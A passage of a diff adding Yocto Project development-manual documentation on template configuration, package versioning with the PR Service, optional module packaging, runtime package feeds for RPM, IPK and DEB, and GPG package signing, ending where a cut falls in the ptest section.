+   -  Add a ``psplash`` append file for a branded splash screen. For
+      information on append files, see the "`Using .bbappend Files in
+      Your Layer <#using-bbappend-files>`__" section.
+
+   -  Add any other append files to make custom changes that are
+      specific to individual recipes.
+
+Creating a Custom Template Configuration Directory
+==================================================
+
+If you are producing your own customized version of the build system for
+use by other users, you might want to customize the message shown by the
+setup script or you might want to change the template configuration
+files (i.e. ``local.conf`` and ``bblayers.conf``) that are created in a
+new build directory.
+
+The OpenEmbedded build system uses the environment variable
+``TEMPLATECONF`` to locate the directory from which it gathers
+configuration information that ultimately ends up in the
+:term:`Build Directory` ``conf`` directory.
+By default, ``TEMPLATECONF`` is set as follows in the ``poky``
+repository:
+::
+
+   TEMPLATECONF=${TEMPLATECONF:-meta-poky/conf}
+
+This is the
+directory used by the build system to find templates from which to build
+some key configuration files. If you look at this directory, you will
+see the ``bblayers.conf.sample``, ``local.conf.sample``, and
+``conf-notes.txt`` files. The build system uses these files to form the
+respective ``bblayers.conf`` file, ``local.conf`` file, and display the
+list of BitBake targets when running the setup script.
+
+To override these default configuration files with configurations you
+want used within every new Build Directory, simply set the
+``TEMPLATECONF`` variable to your directory. The ``TEMPLATECONF``
+variable is set in the ``.templateconf`` file, which is in the top-level
+:term:`Source Directory` folder
+(e.g. ``poky``). Edit the ``.templateconf`` so that it can locate your
+directory.
+
+Best practices dictate that you should keep your template configuration
+directory in your custom distribution layer. For example, suppose you
+have a layer named ``meta-mylayer`` located in your home directory and
+you want your template configuration directory named ``myconf``.
+Changing the ``.templateconf`` as follows causes the OpenEmbedded build
+system to look in your directory and base its configuration files on the
+``*.sample`` configuration files it finds. The final configuration files
+(i.e. ``local.conf`` and ``bblayers.conf`` ultimately still end up in
+your Build Directory, but they are based on your ``*.sample`` files.
+::
+
+   TEMPLATECONF=${TEMPLATECONF:-meta-mylayer/myconf}
+
+Aside from the ``*.sample`` configuration files, the ``conf-notes.txt``
+also resides in the default ``meta-poky/conf`` directory. The script
+that sets up the build environment (i.e.
+:ref:`structure-core-script`) uses this file to
+display BitBake targets as part of the script output. Customizing this
+``conf-notes.txt`` file is a good way to make sure your list of custom
+targets appears as part of the script's output.
+
+Here is the default list of targets displayed as a result of running
+either of the setup scripts:
+::
+
+   You can now run 'bitbake <target>'
+
+   Common targets are:
+       core-image-minimal
+       core-image-sato
+       meta-toolchain
+       meta-ide-support
+
+Changing the listed common targets is as easy as editing your version of
+``conf-notes.txt`` in your custom template configuration directory and
+making sure you have ``TEMPLATECONF`` set to your directory.
+
+.. _dev-saving-memory-during-a-build:
+
+Conserving Disk Space During Builds
+===================================
+
+To help conserve disk space during builds, you can add the following
+statement to your project's ``local.conf`` configuration file found in
+the :term:`Build Directory`:
+::
+
+   INHERIT += "rm_work"
+
+Adding this statement deletes the work directory used for
+building a recipe once the recipe is built. For more information on
+"rm_work", see the
+:ref:`rm_work <ref-classes-rm-work>` class in the
+Yocto Project Reference Manual.
+
+Working with Packages
+=====================
+
+This section describes a few tasks that involve packages:
+
+-  `Excluding packages from an
+   image <#excluding-packages-from-an-image>`__
+
+-  `Incrementing a binary package
+   version <#incrementing-a-binary-package-version>`__
+
+-  `Handling optional module
+   packaging <#handling-optional-module-packaging>`__
+
+-  `Using runtime package
+   management <#using-runtime-package-management>`__
+
+-  `Generating and using signed
+   packages <#generating-and-using-signed-packages>`__
+
+-  `Setting up and running package test
+   (ptest) <#testing-packages-with-ptest>`__
+
+-  `Creating node package manager (NPM)
+   packages <#creating-node-package-manager-npm-packages>`__
+
+-  `Adding custom metadata to
+   packages <#adding-custom-metadata-to-packages>`__
+
+Excluding Packages from an Image
+--------------------------------
+
+You might find it necessary to prevent specific packages from being
+installed into an image. If so, you can use several variables to direct
+the build system to essentially ignore installing recommended packages
+or to not install a package at all.
+
+The following list introduces variables you can use to prevent packages
+from being installed into your image. Each of these variables only works
+with IPK and RPM package types. Support for Debian packages does not
+exist. Also, you can use these variables from your ``local.conf`` file
+or attach them to a specific image recipe by using a recipe name
+override. For more detail on the variables, see the descriptions in the
+Yocto Project Reference Manual's glossary chapter.
+
+-  :term:`BAD_RECOMMENDATIONS`:
+   Use this variable to specify "recommended-only" packages that you do
+   not want installed.
+
+-  :term:`NO_RECOMMENDATIONS`:
+   Use this variable to prevent all "recommended-only" packages from
+   being installed.
+
+-  :term:`PACKAGE_EXCLUDE`:
+   Use this variable to prevent specific packages from being installed
+   regardless of whether they are "recommended-only" or not. You need to
+   realize that the build process could fail with an error when you
+   prevent the installation of a package whose presence is required by
+   an installed package.
+
+.. _incrementing-a-binary-package-version:
+
+Incrementing a Package Version
+------------------------------
+
+This section provides some background on how binary package versioning
+is accomplished and presents some of the services, variables, and
+terminology involved.
+
+In order to understand binary package versioning, you need to consider
+the following:
+
+-  Binary Package: The binary package that is eventually built and
+   installed into an image.
+
+-  Binary Package Version: The binary package version is composed of two
+   components - a version and a revision.
+
+   .. note::
+
+      Technically, a third component, the "epoch" (i.e. :term:`PE`) is involved
+      but this discussion for the most part ignores ``PE``.
+
+   The version and revision are taken from the
+   :term:`PV` and
+   :term:`PR` variables, respectively.
+
+-  ``PV``: The recipe version. ``PV`` represents the version of the
+   software being packaged. Do not confuse ``PV`` with the binary
+   package version.
+
+-  ``PR``: The recipe revision.
+
+-  :term:`SRCPV`: The OpenEmbedded
+   build system uses this string to help define the value of ``PV`` when
+   the source code revision needs to be included in it.
+
+-  :yocto_wiki:`PR Service </wiki/PR_Service>`: A
+   network-based service that helps automate keeping package feeds
+   compatible with existing package manager applications such as RPM,
+   APT, and OPKG.
+
+Whenever the binary package content changes, the binary package version
+must change. Changing the binary package version is accomplished by
+changing or "bumping" the ``PR`` and/or ``PV`` values. Increasing these
+values occurs one of two ways:
+
+-  Automatically using a Package Revision Service (PR Service).
+
+-  Manually incrementing the ``PR`` and/or ``PV`` variables.
+
+Given a primary challenge of any build system and its users is how to
+maintain a package feed that is compatible with existing package manager
+applications such as RPM, APT, and OPKG, using an automated system is
+much preferred over a manual system. In either system, the main
+requirement is that binary package version numbering increases in a
+linear fashion and that a number of version components exist that
+support that linear progression. For information on how to ensure
+package revisioning remains linear, see the "`Automatically Incrementing
+a Binary Package Revision
+Number <#automatically-incrementing-a-binary-package-revision-number>`__"
+section.
+
+The following three sections provide related information on the PR
+Service, the manual method for "bumping" ``PR`` and/or ``PV``, and on
+how to ensure binary package revisioning remains linear.
+
+Working With a PR Service
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As mentioned, attempting to maintain revision numbers in the
+:term:`Metadata` is error prone, inaccurate,
+and causes problems for people submitting recipes. Conversely, the PR
+Service automatically generates increasing numbers, particularly the
+revision field, which removes the human element.
+
+.. note::
+
+   For additional information on using a PR Service, you can see the
+   :yocto_wiki:`PR Service </wiki/PR_Service>` wiki page.
+
+The Yocto Project uses variables in order of decreasing priority to
+facilitate revision numbering (i.e.
+:term:`PE`,
+:term:`PV`, and
+:term:`PR` for epoch, version, and
+revision, respectively). The values are highly dependent on the policies
+and procedures of a given distribution and package feed.
+
+Because the OpenEmbedded build system uses
+":ref:`signatures <overview-checksums>`", which are
+unique to a given build, the build system knows when to rebuild
+packages. All the inputs into a given task are represented by a
+signature, which can trigger a rebuild when different. Thus, the build
+system itself does not rely on the ``PR``, ``PV``, and ``PE`` numbers to
+trigger a rebuild. The signatures, however, can be used to generate
+these values.
+
+The PR Service works with both ``OEBasic`` and ``OEBasicHash``
+generators. The value of ``PR`` bumps when the checksum changes and the
+different generator mechanisms change signatures under different
+circumstances.
+
+As implemented, the build system includes values from the PR Service
+into the ``PR`` field as an addition using the form "``.x``" so ``r0``
+becomes ``r0.1``, ``r0.2`` and so forth. This scheme allows existing
+``PR`` values to be used for whatever reasons, which include manual
+``PR`` bumps, should it be necessary.
+
+By default, the PR Service is not enabled or running. Thus, the packages
+generated are just "self consistent". The build system adds and removes
+packages and there are no guarantees about upgrade paths but images will
+be consistent and correct with the latest changes.
+
+The simplest form for a PR Service is for it to exist for a single host
+development system that builds the package feed (building system). For
+this scenario, you can enable a local PR Service by setting
+:term:`PRSERV_HOST` in your
+``local.conf`` file in the :term:`Build Directory`:
+::
+
+   PRSERV_HOST = "localhost:0"
+
+Once the service is started, packages will automatically
+get increasing ``PR`` values and BitBake takes care of starting and
+stopping the server.
+
+If you have a more complex setup where multiple host development systems
+work against a common, shared package feed, you have a single PR Service
+running and it is connected to each building system. For this scenario,
+you need to start the PR Service using the ``bitbake-prserv`` command:
+::
+
+   bitbake-prserv --host ip --port port --start
+
+In addition to
+hand-starting the service, you need to update the ``local.conf`` file of
+each building system as described earlier so each system points to the
+server and port.
+
+It is also recommended you use build history, which adds some sanity
+checks to binary package versions, in conjunction with the server that
+is running the PR Service. To enable build history, add the following to
+each building system's ``local.conf`` file:
+::
+
+   # It is recommended to activate "buildhistory" for testing the PR service
+   INHERIT += "buildhistory"
+   BUILDHISTORY_COMMIT = "1"
+
+For information on build
+history, see the "`Maintaining Build Output
+Quality <#maintaining-build-output-quality>`__" section.
+
+.. note::
+
+   The OpenEmbedded build system does not maintain ``PR`` information as
+   part of the shared state (sstate) packages. If you maintain an sstate
+   feed, its expected that either all your building systems that
+   contribute to the sstate feed use a shared PR Service, or you do not
+   run a PR Service on any of your building systems. Having some systems
+   use a PR Service while others do not leads to obvious problems.
+
+   For more information on shared state, see the
+   ":ref:`overview-manual/overview-manual-concepts:shared state cache`"
+   section in the Yocto Project Overview and Concepts Manual.
+
+Manually Bumping PR
+~~~~~~~~~~~~~~~~~~~
+
+The alternative to setting up a PR Service is to manually "bump" the
+:term:`PR` variable.
+
+If a committed change results in changing the package output, then the
+value of the PR variable needs to be increased (or "bumped") as part of
+that commit. For new recipes you should add the ``PR`` variable and set
+its initial value equal to "r0", which is the default. Even though the
+default value is "r0", the practice of adding it to a new recipe makes
+it harder to forget to bump the variable when you make changes to the
+recipe in future.
+
+If you are sharing a common ``.inc`` file with multiple recipes, you can
+also use the ``INC_PR`` variable to ensure that the recipes sharing the
+``.inc`` file are rebuilt when the ``.inc`` file itself is changed. The
+``.inc`` file must set ``INC_PR`` (initially to "r0"), and all recipes
+referring to it should set ``PR`` to "${INC_PR}.0" initially,
+incrementing the last number when the recipe is changed. If the ``.inc``
+file is changed then its ``INC_PR`` should be incremented.
+
+When upgrading the version of a binary package, assuming the ``PV``
+changes, the ``PR`` variable should be reset to "r0" (or "${INC_PR}.0"
+if you are using ``INC_PR``).
+
+Usually, version increases occur only to binary packages. However, if
+for some reason ``PV`` changes but does not increase, you can increase
+the ``PE`` variable (Package Epoch). The ``PE`` variable defaults to
+"0".
+
+Binary package version numbering strives to follow the `Debian Version
+Field Policy
+Guidelines <https://www.debian.org/doc/debian-policy/ch-controlfields.html>`__.
+These guidelines define how versions are compared and what "increasing"
+a version means.
+
+.. _automatically-incrementing-a-binary-package-revision-number:
+
+Automatically Incrementing a Package Version Number
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When fetching a repository, BitBake uses the
+:term:`SRCREV` variable to determine
+the specific source code revision from which to build. You set the
+``SRCREV`` variable to
+:term:`AUTOREV` to cause the
+OpenEmbedded build system to automatically use the latest revision of
+the software:
+::
+
+   SRCREV = "${AUTOREV}"
+
+Furthermore, you need to reference ``SRCPV`` in ``PV`` in order to
+automatically update the version whenever the revision of the source
+code changes. Here is an example:
+::
+
+   PV = "1.0+git${SRCPV}"
+
+The OpenEmbedded build system substitutes ``SRCPV`` with the following:
+
+.. code-block:: none
+
+   AUTOINC+source_code_revision
+
+The build system replaces the ``AUTOINC``
+with a number. The number used depends on the state of the PR Service:
+
+-  If PR Service is enabled, the build system increments the number,
+   which is similar to the behavior of
+   :term:`PR`. This behavior results in
+   linearly increasing package versions, which is desirable. Here is an
+   example:
+
+   .. code-block:: none
+
+      hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
+      hello-world-git_0.0+git1+dd2f5c3565-r0.0_armv7a-neon.ipk
+
+-  If PR Service is not enabled, the build system replaces the
+   ``AUTOINC`` placeholder with zero (i.e. "0"). This results in
+   changing the package version since the source revision is included.
+   However, package versions are not increased linearly. Here is an
+   example:
+
+   .. code-block:: none
+
+      hello-world-git_0.0+git0+b6558dd387-r0.0_armv7a-neon.ipk
+      hello-world-git_0.0+git0+dd2f5c3565-r0.0_armv7a-neon.ipk
+
+In summary, the OpenEmbedded build system does not track the history of
+binary package versions for this purpose. ``AUTOINC``, in this case, is
+comparable to ``PR``. If PR server is not enabled, ``AUTOINC`` in the
+package version is simply replaced by "0". If PR server is enabled, the
+build system keeps track of the package versions and bumps the number
+when the package revision changes.
+
+Handling Optional Module Packaging
+----------------------------------
+
+Many pieces of software split functionality into optional modules (or
+plugins) and the plugins that are built might depend on configuration
+options. To avoid having to duplicate the logic that determines what
+modules are available in your recipe or to avoid having to package each
+module by hand, the OpenEmbedded build system provides functionality to
+handle module packaging dynamically.
+
+To handle optional module packaging, you need to do two things:
+
+-  Ensure the module packaging is actually done.
+
+-  Ensure that any dependencies on optional modules from other recipes
+   are satisfied by your recipe.
+
+Making Sure the Packaging is Done
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To ensure the module packaging actually gets done, you use the
+``do_split_packages`` function within the ``populate_packages`` Python
+function in your recipe. The ``do_split_packages`` function searches for
+a pattern of files or directories under a specified path and creates a
+package for each one it finds by appending to the
+:term:`PACKAGES` variable and
+setting the appropriate values for ``FILES_packagename``,
+``RDEPENDS_packagename``, ``DESCRIPTION_packagename``, and so forth.
+Here is an example from the ``lighttpd`` recipe:
+::
+
+   python populate_packages_prepend () {
+       lighttpd_libdir = d.expand('${libdir}')
+       do_split_packages(d, lighttpd_libdir, '^mod_(.*).so$',
+                        'lighttpd-module-%s', 'Lighttpd module for %s',
+                         extra_depends='')
+   }
+
+The previous example specifies a number of things in the call to
+``do_split_packages``.
+
+-  A directory within the files installed by your recipe through
+   ``do_install`` in which to search.
+
+-  A regular expression used to match module files in that directory. In
+   the example, note the parentheses () that mark the part of the
+   expression from which the module name should be derived.
+
+-  A pattern to use for the package names.
+
+-  A description for each package.
+
+-  An empty string for ``extra_depends``, which disables the default
+   dependency on the main ``lighttpd`` package. Thus, if a file in
+   ``${libdir}`` called ``mod_alias.so`` is found, a package called
+   ``lighttpd-module-alias`` is created for it and the
+   :term:`DESCRIPTION` is set to
+   "Lighttpd module for alias".
+
+Often, packaging modules is as simple as the previous example. However,
+more advanced options exist that you can use within
+``do_split_packages`` to modify its behavior. And, if you need to, you
+can add more logic by specifying a hook function that is called for each
+package. It is also perfectly acceptable to call ``do_split_packages``
+multiple times if you have more than one set of modules to package.
+
+For more examples that show how to use ``do_split_packages``, see the
+``connman.inc`` file in the ``meta/recipes-connectivity/connman/``
+directory of the ``poky`` :ref:`source repository <yocto-project-repositories>`. You can
+also find examples in ``meta/classes/kernel.bbclass``.
+
+Following is a reference that shows ``do_split_packages`` mandatory and
+optional arguments:
+::
+
+   Mandatory arguments
+
+   root
+      The path in which to search
+   file_regex
+      Regular expression to match searched files.
+      Use parentheses () to mark the part of this
+      expression that should be used to derive the
+      module name (to be substituted where %s is
+      used in other function arguments as noted below)
+   output_pattern
+      Pattern to use for the package names. Must
+      include %s.
+   description
+      Description to set for each package. Must
+      include %s.
+
+   Optional arguments
+
+   postinst
+      Postinstall script to use for all packages
+      (as a string)
+   recursive
+      True to perform a recursive search - default
+      False
+   hook
+      A hook function to be called for every match.
+      The function will be called with the following
+      arguments (in the order listed):
+
+      f
+         Full path to the file/directory match
+      pkg
+         The package name
+      file_regex
+         As above
+      output_pattern
+         As above
+      modulename
+         The module name derived using file_regex
+   extra_depends
+      Extra runtime dependencies (RDEPENDS) to be
+      set for all packages. The default value of None
+      causes a dependency on the main package
+      (${PN}) - if you do not want this, pass empty
+      string '' for this parameter.
+   aux_files_pattern
+      Extra item(s) to be added to FILES for each
+      package. Can be a single string item or a list
+      of strings for multiple items. Must include %s.
+   postrm
+      postrm script to use for all packages (as a
+      string)
+   allow_dirs
+      True to allow directories to be matched -
+      default False
+   prepend
+      If True, prepend created packages to PACKAGES
+      instead of the default False which appends them
+   match_path
+      match file_regex on the whole relative path to
+      the root rather than just the file name
+   aux_files_pattern_verbatim
+      Extra item(s) to be added to FILES for each
+      package, using the actual derived module name
+      rather than converting it to something legal
+      for a package name. Can be a single string item
+      or a list of strings for multiple items. Must
+      include %s.
+   allow_links
+      True to allow symlinks to be matched - default
+      False
+   summary
+      Summary to set for each package. Must include %s;
+      defaults to description if not set.
+
+
+
+Satisfying Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~
+
+The second part for handling optional module packaging is to ensure that
+any dependencies on optional modules from other recipes are satisfied by
+your recipe. You can be sure these dependencies are satisfied by using
+the :term:`PACKAGES_DYNAMIC`
+variable. Here is an example that continues with the ``lighttpd`` recipe
+shown earlier:
+::
+
+   PACKAGES_DYNAMIC = "lighttpd-module-.*"
+
+The name
+specified in the regular expression can of course be anything. In this
+example, it is ``lighttpd-module-`` and is specified as the prefix to
+ensure that any :term:`RDEPENDS` and
+:term:`RRECOMMENDS` on a package
+name starting with the prefix are satisfied during build time. If you
+are using ``do_split_packages`` as described in the previous section,
+the value you put in ``PACKAGES_DYNAMIC`` should correspond to the name
+pattern specified in the call to ``do_split_packages``.
+
+Using Runtime Package Management
+--------------------------------
+
+During a build, BitBake always transforms a recipe into one or more
+packages. For example, BitBake takes the ``bash`` recipe and produces a
+number of packages (e.g. ``bash``, ``bash-bashbug``,
+``bash-completion``, ``bash-completion-dbg``, ``bash-completion-dev``,
+``bash-completion-extra``, ``bash-dbg``, and so forth). Not all
+generated packages are included in an image.
+
+In several situations, you might need to update, add, remove, or query
+the packages on a target device at runtime (i.e. without having to
+generate a new image). Examples of such situations include:
+
+-  You want to provide in-the-field updates to deployed devices (e.g.
+   security updates).
+
+-  You want to have a fast turn-around development cycle for one or more
+   applications that run on your device.
+
+-  You want to temporarily install the "debug" packages of various
+   applications on your device so that debugging can be greatly improved
+   by allowing access to symbols and source debugging.
+
+-  You want to deploy a more minimal package selection of your device
+   but allow in-the-field updates to add a larger selection for
+   customization.
+
+In all these situations, you have something similar to a more
+traditional Linux distribution in that in-field devices are able to
+receive pre-compiled packages from a server for installation or update.
+Being able to install these packages on a running, in-field device is
+what is termed "runtime package management".
+
+In order to use runtime package management, you need a host or server
+machine that serves up the pre-compiled packages plus the required
+metadata. You also need package manipulation tools on the target. The
+build machine is a likely candidate to act as the server. However, that
+machine does not necessarily have to be the package server. The build
+machine could push its artifacts to another machine that acts as the
+server (e.g. Internet-facing). In fact, doing so is advantageous for a
+production environment as getting the packages away from the development
+system's build directory prevents accidental overwrites.
+
+A simple build that targets just one device produces more than one
+package database. In other words, the packages produced by a build are
+separated out into a couple of different package groupings based on
+criteria such as the target's CPU architecture, the target board, or the
+C library used on the target. For example, a build targeting the
+``qemux86`` device produces the following three package databases:
+``noarch``, ``i586``, and ``qemux86``. If you wanted your ``qemux86``
+device to be aware of all the packages that were available to it, you
+would need to point it to each of these databases individually. In a
+similar way, a traditional Linux distribution usually is configured to
+be aware of a number of software repositories from which it retrieves
+packages.
+
+Using runtime package management is completely optional and not required
+for a successful build or deployment in any way. But if you want to make
+use of runtime package management, you need to do a couple things above
+and beyond the basics. The remainder of this section describes what you
+need to do.
+
+.. _runtime-package-management-build:
+
+Build Considerations
+~~~~~~~~~~~~~~~~~~~~
+
+This section describes build considerations of which you need to be
+aware in order to provide support for runtime package management.
+
+When BitBake generates packages, it needs to know what format or formats
+to use. In your configuration, you use the
+:term:`PACKAGE_CLASSES`
+variable to specify the format:
+
+1. Open the ``local.conf`` file inside your
+   :term:`Build Directory` (e.g.
+   ``~/poky/build/conf/local.conf``).
+
+2. Select the desired package format as follows:
+   ::
+
+      PACKAGE_CLASSES ?= "package_packageformat"
+
+   where packageformat can be "ipk", "rpm",
+   "deb", or "tar" which are the supported package formats.
+
+   .. note::
+
+      Because the Yocto Project supports four different package formats,
+      you can set the variable with more than one argument. However, the
+      OpenEmbedded build system only uses the first argument when
+      creating an image or Software Development Kit (SDK).
+
+If you would like your image to start off with a basic package database
+containing the packages in your current build as well as to have the
+relevant tools available on the target for runtime package management,
+you can include "package-management" in the
+:term:`IMAGE_FEATURES`
+variable. Including "package-management" in this configuration variable
+ensures that when the image is assembled for your target, the image
+includes the currently-known package databases as well as the
+target-specific tools required for runtime package management to be
+performed on the target. However, this is not strictly necessary. You
+could start your image off without any databases but only include the
+required on-target package tool(s). As an example, you could include
+"opkg" in your
+:term:`IMAGE_INSTALL` variable
+if you are using the IPK package format. You can then initialize your
+target's package database(s) later once your image is up and running.
+
+Whenever you perform any sort of build step that can potentially
+generate a package or modify existing package, it is always a good idea
+to re-generate the package index after the build by using the following
+command:
+::
+
+   $ bitbake package-index
+
+It might be tempting to build the
+package and the package index at the same time with a command such as
+the following:
+::
+
+   $ bitbake some-package package-index
+
+Do not do this as
+BitBake does not schedule the package index for after the completion of
+the package you are building. Consequently, you cannot be sure of the
+package index including information for the package you just built.
+Thus, be sure to run the package update step separately after building
+any packages.
+
+You can use the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables to pre-configure target images to use a package feed. If you
+do not define these variables, then manual steps as described in the
+subsequent sections are necessary to configure the target. You should
+set these variables before building the image in order to produce a
+correctly configured image.
+
+When your build is complete, your packages reside in the
+``${TMPDIR}/deploy/packageformat`` directory. For example, if
+``${``\ :term:`TMPDIR`\ ``}`` is
+``tmp`` and your selected package type is RPM, then your RPM packages
+are available in ``tmp/deploy/rpm``.
+
+.. _runtime-package-management-server:
+
+Host or Server Machine Setup
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Although other protocols are possible, a server using HTTP typically
+serves packages. If you want to use HTTP, then set up and configure a
+web server such as Apache 2, lighttpd, or Python web server on the
+machine serving the packages.
+
+To keep things simple, this section describes how to set up a
+Python web server to share package feeds from the developer's
+machine. Although this server might not be the best for a production
+environment, the setup is simple and straight forward. Should you want
+to use a different server more suited for production (e.g. Apache 2,
+Lighttpd, or Nginx), take the appropriate steps to do so.
+
+From within the build directory where you have built an image based on
+your packaging choice (i.e. the
+:term:`PACKAGE_CLASSES`
+setting), simply start the server. The following example assumes a build
+directory of ``~/poky/build/tmp/deploy/rpm`` and a ``PACKAGE_CLASSES``
+setting of "package_rpm":
+::
+
+   $ cd ~/poky/build/tmp/deploy/rpm
+   $ python3 -m http.server
+
+.. _runtime-package-management-target:
+
+Target Setup
+~~~~~~~~~~~~
+
+Setting up the target differs depending on the package management
+system. This section provides information for RPM, IPK, and DEB.
+
+.. _runtime-package-management-target-rpm:
+
+Using RPM
+^^^^^^^^^
+
+The `Dandified Packaging
+Tool <https://en.wikipedia.org/wiki/DNF_(software)>`__ (DNF) performs
+runtime package management of RPM packages. In order to use DNF for
+runtime package management, you must perform an initial setup on the
+target machine for cases where the ``PACKAGE_FEED_*`` variables were not
+set as part of the image that is running on the target. This means if
+you built your image and did not not use these variables as part of the
+build and your image is now running on the target, you need to perform
+the steps in this section if you want to use runtime package management.
+
+.. note::
+
+   For information on the ``PACKAGE_FEED_*`` variables, see
+   :term:`PACKAGE_FEED_ARCHS`, :term:`PACKAGE_FEED_BASE_PATHS`, and
+   :term:`PACKAGE_FEED_URIS` in the Yocto Project Reference Manual variables
+   glossary.
+
+On the target, you must inform DNF that package databases are available.
+You do this by creating a file named
+``/etc/yum.repos.d/oe-packages.repo`` and defining the ``oe-packages``.
+
+As an example, assume the target is able to use the following package
+databases: ``all``, ``i586``, and ``qemux86`` from a server named
+``my.server``. The specifics for setting up the web server are up to
+you. The critical requirement is that the URIs in the target repository
+configuration point to the correct remote location for the feeds.
+
+.. note::
+
+   For development purposes, you can point the web server to the build
+   system's ``deploy`` directory. However, for production use, it is better to
+   copy the package directories to a location outside of the build area and use
+   that location. Doing so avoids situations where the build system
+   overwrites or changes the ``deploy`` directory.
+
+When telling DNF where to look for the package databases, you must
+declare individual locations per architecture or a single location used
+for all architectures. You cannot do both:
+
+-  *Create an Explicit List of Architectures:* Define individual base
+   URLs to identify where each package database is located:
+
+   .. code-block:: none
+
+      [oe-packages]
+      baseurl=http://my.server/rpm/i586  http://my.server/rpm/qemux86 http://my.server/rpm/all
+
+   This example
+   informs DNF about individual package databases for all three
+   architectures.
+
+-  *Create a Single (Full) Package Index:* Define a single base URL that
+   identifies where a full package database is located:
+   ::
+
+      [oe-packages]
+      baseurl=http://my.server/rpm
+
+   This example informs DNF about a single
+   package database that contains all the package index information for
+   all supported architectures.
+
+Once you have informed DNF where to find the package databases, you need
+to fetch them:
+
+.. code-block:: none
+
+   # dnf makecache
+
+DNF is now able to find, install, and
+upgrade packages from the specified repository or repositories.
+
+.. note::
+
+   See the `DNF documentation <https://dnf.readthedocs.io/en/latest/>`__ for
+   additional information.
+
+.. _runtime-package-management-target-ipk:
+
+Using IPK
+^^^^^^^^^
+
+The ``opkg`` application performs runtime package management of IPK
+packages. You must perform an initial setup for ``opkg`` on the target
+machine if the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables have not been set or the target image was built before the
+variables were set.
+
+The ``opkg`` application uses configuration files to find available
+package databases. Thus, you need to create a configuration file inside
+the ``/etc/opkg/`` direction, which informs ``opkg`` of any repository
+you want to use.
+
+As an example, suppose you are serving packages from a ``ipk/``
+directory containing the ``i586``, ``all``, and ``qemux86`` databases
+through an HTTP server named ``my.server``. On the target, create a
+configuration file (e.g. ``my_repo.conf``) inside the ``/etc/opkg/``
+directory containing the following:
+
+.. code-block:: none
+
+   src/gz all http://my.server/ipk/all
+   src/gz i586 http://my.server/ipk/i586
+   src/gz qemux86 http://my.server/ipk/qemux86
+
+Next, instruct ``opkg`` to fetch the
+repository information:
+
+.. code-block:: none
+
+   # opkg update
+
+The ``opkg`` application is now able to find, install, and upgrade packages
+from the specified repository.
+
+.. _runtime-package-management-target-deb:
+
+Using DEB
+^^^^^^^^^
+
+The ``apt`` application performs runtime package management of DEB
+packages. This application uses a source list file to find available
+package databases. You must perform an initial setup for ``apt`` on the
+target machine if the
+:term:`PACKAGE_FEED_ARCHS`,
+:term:`PACKAGE_FEED_BASE_PATHS`,
+and
+:term:`PACKAGE_FEED_URIS`
+variables have not been set or the target image was built before the
+variables were set.
+
+To inform ``apt`` of the repository you want to use, you might create a
+list file (e.g. ``my_repo.list``) inside the
+``/etc/apt/sources.list.d/`` directory. As an example, suppose you are
+serving packages from a ``deb/`` directory containing the ``i586``,
+``all``, and ``qemux86`` databases through an HTTP server named
+``my.server``. The list file should contain:
+
+.. code-block:: none
+
+   deb http://my.server/deb/all ./
+   deb http://my.server/deb/i586 ./
+   deb http://my.server/deb/qemux86 ./
+
+Next, instruct the ``apt`` application
+to fetch the repository information:
+
+.. code-block:: none
+
+  # apt-get update
+
+After this step,
+``apt`` is able to find, install, and upgrade packages from the
+specified repository.
+
+Generating and Using Signed Packages
+------------------------------------
+
+In order to add security to RPM packages used during a build, you can
+take steps to securely sign them. Once a signature is verified, the
+OpenEmbedded build system can use the package in the build. If security
+fails for a signed package, the build system aborts the build.
+
+This section describes how to sign RPM packages during a build and how
+to use signed package feeds (repositories) when doing a build.
+
+Signing RPM Packages
+~~~~~~~~~~~~~~~~~~~~
+
+To enable signing RPM packages, you must set up the following
+configurations in either your ``local.config`` or ``distro.config``
+file:
+::
+
+   # Inherit sign_rpm.bbclass to enable signing functionality
+   INHERIT += " sign_rpm"
+   # Define the GPG key that will be used for signing.
+   RPM_GPG_NAME = "key_name"
+   # Provide passphrase for the key
+   RPM_GPG_PASSPHRASE = "passphrase"
+
+.. note::
+
+   Be sure to supply appropriate values for both `key_name` and
+   `passphrase`.
+
+Aside from the ``RPM_GPG_NAME`` and ``RPM_GPG_PASSPHRASE`` variables in
+the previous example, two optional variables related to signing exist:
+
+-  *GPG_BIN:* Specifies a ``gpg`` binary/wrapper that is executed
+   when the package is signed.
+
+-  *GPG_PATH:* Specifies the ``gpg`` home directory used when the
+   package is signed.
+
+Processing Package Feeds
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+In addition to being able to sign RPM packages, you can also enable
+signed package feeds for IPK and RPM packages.
+
+The steps you need to take to enable signed package feed use are similar
+to the steps used to sign RPM packages. You must define the following in
+your ``local.config`` or ``distro.config`` file:
+::
+
+   INHERIT += "sign_package_feed"
+   PACKAGE_FEED_GPG_NAME = "key_name"
+   PACKAGE_FEED_GPG_PASSPHRASE_FILE = "path_to_file_containing_passphrase"
+
+For signed package feeds, the passphrase must exist in a separate file,
+which is pointed to by the ``PACKAGE_FEED_GPG_PASSPHRASE_FILE``
+variable. Regarding security, keeping a plain text passphrase out of the
+configuration is more secure.
+
+Aside from the ``PACKAGE_FEED_GPG_NAME`` and
+``PACKAGE_FEED_GPG_PASSPHRASE_FILE`` variables, three optional variables
+related to signed package feeds exist:
+
+-  *GPG_BIN* Specifies a ``gpg`` binary/wrapper that is executed
+   when the package is signed.
+
+-  *GPG_PATH:* Specifies the ``gpg`` home directory used when the
+   package is signed.
+
+-  *PACKAGE_FEED_GPG_SIGNATURE_TYPE:* Specifies the type of ``gpg``
+   signature. This variable applies only to RPM and IPK package feeds.
+   Allowable values for the ``PACKAGE_FEED_GPG_SIGNATURE_TYPE`` are
+   "ASC", which is the default and specifies ascii armored, and "BIN",
+   which specifies binary.
+
+Testing Packages With ptest
+---------------------------
+
+A Package Test (ptest) runs tests against packages built by the
+OpenEmbedded build system on the target machine. A ptest contains at
